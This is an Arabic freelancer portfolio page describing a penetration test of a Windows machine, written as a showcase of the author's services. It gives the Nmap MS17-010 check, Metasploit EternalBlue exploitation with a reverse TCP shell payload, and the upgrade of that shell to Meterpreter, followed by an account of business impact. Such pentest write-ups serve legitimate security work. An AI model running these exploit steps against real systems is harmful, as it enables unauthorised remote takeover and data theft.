تصفح المشاريع
تصفح المنفذين
تصفح الأعمال
تصفح الخدمات
مجتمع نفذلي
تغيير الوضع
الدليل الإرشادي
الدعم الفني
عرض المزيد
إضافة مشروع
طلب عمل مماثل
تواصل

اختبار اختراق أخلاقي واكتشاف الثغرات

الرئيسية / الأعمال / اختبار اختراق أخلاقي واكتشاف الثغرات
طلب عمل مماثل
اختبار اختراق أخلاقي واكتشاف الثغرات اختبار اختراق أخلاقي واكتشاف الثغرات اختبار اختراق أخلاقي واكتشاف الثغرات اختبار اختراق أخلاقي واكتشاف الثغرات اختبار اختراق أخلاقي واكتشاف الثغرات اختبار اختراق أخلاقي واكتشاف الثغرات اختبار اختراق أخلاقي واكتشاف الثغرات اختبار اختراق أخلاقي واكتشاف الثغرات اختبار اختراق أخلاقي واكتشاف الثغرات اختبار اختراق أخلاقي واكتشاف الثغرات
تفاصيل العمل

بصفتي مهندس أمن معلومات، تم إجراء فحص شامل لتحديد المنافذ المفتوحة والخدمات التي تعمل على الجهاز، بغرض تقييم المخاطر وتحديد الثغرات المحتملة، وتحديد الثغرات الحرجة، وتقديم إثبات عملي لكيفية استغلالها لتقييم المخاطر الأمنية داخل الشركة. 1. مرحلة الاستطلاع (Reconnaissance) في هذه المرحلة، يتم فحص الهدف لتحديد المنافذ المفتوحة والخدمات المفعلة. أ- مسح المنافذ (Nmap Scan): استخدمت أداة Nmap لاكتشاف المنافذ والخدمات. 2. تحديد الثغرة (Vulnerability Identification) بعد اكتشاف منفذ SMB، قمت بتشغيل سكربت متخصص للتأكد من إصابة الجهاز بثغرة MS17-010. <nmap -p 445 --script=smb-vuln-ms17-010 <target_ip تحليل النتيجة: الحالة: VULNERABLE (مصاب). نوع الثغرة: Remote Code Execution (RCE). تصنيف الخطورة: HIGH (عالية جداً). الوصف: الجهاز معرض لهجوم EternalBlue الذي يسمح للمهاجم بتنفيذ أوامر عن بُعد بصلاحيات كاملة. 3. إثبات المفهوم والاستغلال (Exploitation - PoC) استخدام إطار عمل Metasploit للوصول إلى النظام. خطوات الوصول (Gain Access): تشغيل الأداة: msfconsole البحث عن الثغرة: search ms17_010 اختيار طريقة الاستغلال المناسبة: use exploit/windows/smb/ms17_010_eternalblue اعدادات الاستغلال: نقوم بضبط الـ Payload والـ RHOSTS (عنوان الهدف): <set RHOSTS <target_ip set payload windows/x64/shell/reverse_tcp run 4. ترقية الصلاحيات (Privilege Escalation) بعد الحصول على جلسة (Shell) عادية، نقوم بترقيتها إلى Meterpreter للحصول على تحكم كامل وأدوات متقدمة. الخطوات: وضع الجلسة الحالية في الخلفية: CTRL + Z استخدام وحدة الترقية: use multi/manage/shell_to_meterpreter set session 1 run 5. التأثير على الأعمال (Business Impact) بمجرد الحصول على صلاحيات Meterpreter، يصبح المهاجم قادراً على: التحكم الكامل: القدرة على إيقاف تشغيل الجهاز أو إعادة تشغيله. تخريب البيانات: حذف أو تعديل الملفات الحساسة للشركة. التجسس: مراقبة العمليات الجارية وسحب البيانات السرية. الانتشار: استخدام الجهاز المصاب كنقطة انطلاق لمهاجمة باقي أجهزة الشبكة الداخلية. في عالم الأمن السيبراني، الفارق بين الأمان والاختراق هو "التفاصيل". إليك القيمة المضافة التي سأقدمها : تقديم تقارير مفصلة تشمل الثغرة وطريقة علاجها. محاكاة واقعية للهجمات (Red Teaming) لاختبار كفاءة الدفاعات. الالتزام بأعلى معايير السرية والأمان أثناء العمل.

طلب عمل مماثل
مهارات العمل
اختبار الاختراق Computer Security أمن وحماية المواقع
شارك
بطاقة العمل
تاريخ النشر
منذ 5 ساعات
المشاهدات
2
القسم
برمجة، تطوير المواقع والتطبيقات
المستقل
Ahmed Elgendy
Ahmed Elgendy
مهندس أمن معلومات
طلب عمل مماثل
مهارات العمل
اختبار الاختراق Computer Security أمن وحماية المواقع
شارك
خدمات مقترحة
تعلم
تابعنا
روابط
وسائل الدفع
وسائل الدفع
وسائل السحب
وسائل السحب
مركز المساعدة